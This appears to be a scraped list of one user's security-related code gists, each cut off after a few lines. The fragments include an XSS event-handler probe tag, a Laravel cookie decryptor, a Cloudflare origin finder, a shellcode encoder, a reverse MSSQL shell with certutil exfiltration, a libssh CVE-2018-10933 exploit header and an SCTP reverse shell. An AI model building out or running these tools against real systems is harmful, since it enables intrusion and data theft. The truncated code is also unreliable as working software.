ricardojba

<a onafterprint="console.log(244599)" onbeforeprint="console.log(309354)" onbeforeunload="console.log(879813)" onerror="console.log(949564)" onhashchange="console.log(575242)" onload="console.log(301053)" onmessage="console.log(976974)" onoffline="console.log(796090)" ononline="console.log(432638)" onpagehide="console.log(504345)" onpageshow="console.log(696619)" onpopstate="console.log(398418)" onresize="console.log(943097)" onstorage="console.log(882233)" onunload="console.log(929443)" onblur="console.log(932104)" onchange="console.log(102339)" oncontextmenu="console.log(761265)" onfocus="console.log(188946)" oninput="console.log(143653)" oninvalid="console.log(304208)" onreset="console.log(318472)" onsearch="console.log(778420)" onselect="console.log(942035)" onsubmit="console.log(603589)" onkeydown="console.log(650647)" onkeypress="console.log(579383)" onkeyup="console.log(821763)" onclick="console.log(284098)" ondblclick="console.log(477370)" ondrag="console.log(439095)" ondragend="console.log(546684)" o

ricardojba

import os
import base64
import json
from Crypto.Cipher import AES
from phpserialize import loads


def decrypt(payload):
    data = json.loads(base64.b64decode(payload))

ricardojba

# Python3 code below
import os
import base64
import json
from Crypto.Cipher import AES
from phpserialize import loads
import hashlib
import hmac

ricardojba

#!/usr/bin/env python3

import censys.certificates
import censys.ipv4
from sys import argv

UID = "**CHANGE**"
SECRET = "**CHANGE**"

def is_cloudflare(dn):

ricardojba

#!/usr/bin/env python
# DiabloHorn - https://diablohorn.com
# scan target IP from an interface with no IP configured
# POC - scapy
#   pkt = Ether(dst='00:0c:29:f6:a5:65',src='00:08:19:2c:e0:15') / IP(dst='172.16.218.178',src='172.16.218.255') / TCP(dport=445,flags='S')
#   sendp(pkt,iface='eth0')


import sys
from scapy.all import *

ricardojba

#!/usr/bin/python
#
# Shellcode to ASCII encoder leveraging rebuilding on-the-stack technique,
# and using Jon Erickson's algorithm from Phiral Research Labs `Dissembler` 
# utility (as described in: Hacking - The Art of Exploitation).
#
# Basically one gives to the program's output a binary encoded shellcode,
# and it yields on the output it's ASCII encoded form.
#
# This payload will at the beginning align the stack by firstly moving 

ricardojba

import sys
import requests
import threading
import HTMLParser
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler

'''
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
Author: @xassiz
'''

ricardojba

CRLF Injection Into PHP's cURL Options

I spent the weekend meeting hackers in Vegas, and I got talking to one of them about CRLF Injection. They'd not seen many CRLF Injection vulnerabilities in the wild, so I thought I'd write up an example that's similar to something I found a few months ago.

If you're looking for bugs legally through a program like hackerone, or you're a programmer wanting to write secure PHP: this might be useful to you.

ricardojba

#!/usr/bin/env python
# -*- coding: utf-8 -*-

# Based on https://www.openwall.com/lists/oss-security/2018/08/16/1
# and on https://www.libssh.org/security/advisories/CVE-2018-10933.txt
# Original exploit code https://gist.github.com/mlosapio/2062ebf943485a7289d226e0d00498e7
# References
# https://qxf2.com/blog/ssh-using-python-paramiko/
# https://github.com/SoledaD208/CVE-2018-10933
# On OSX -> pip install paramiko==2.0.8

ricardojba

#!/usr/bin/env python3
#
# Tiny SCTP Reverse Shell inspired by http://insecurety.net/?p=765
# Connect with `ncat --sctp -lvp 1234`

import os, socket, subprocess

RHOST = '127.0.0.1'
RPORT = 1234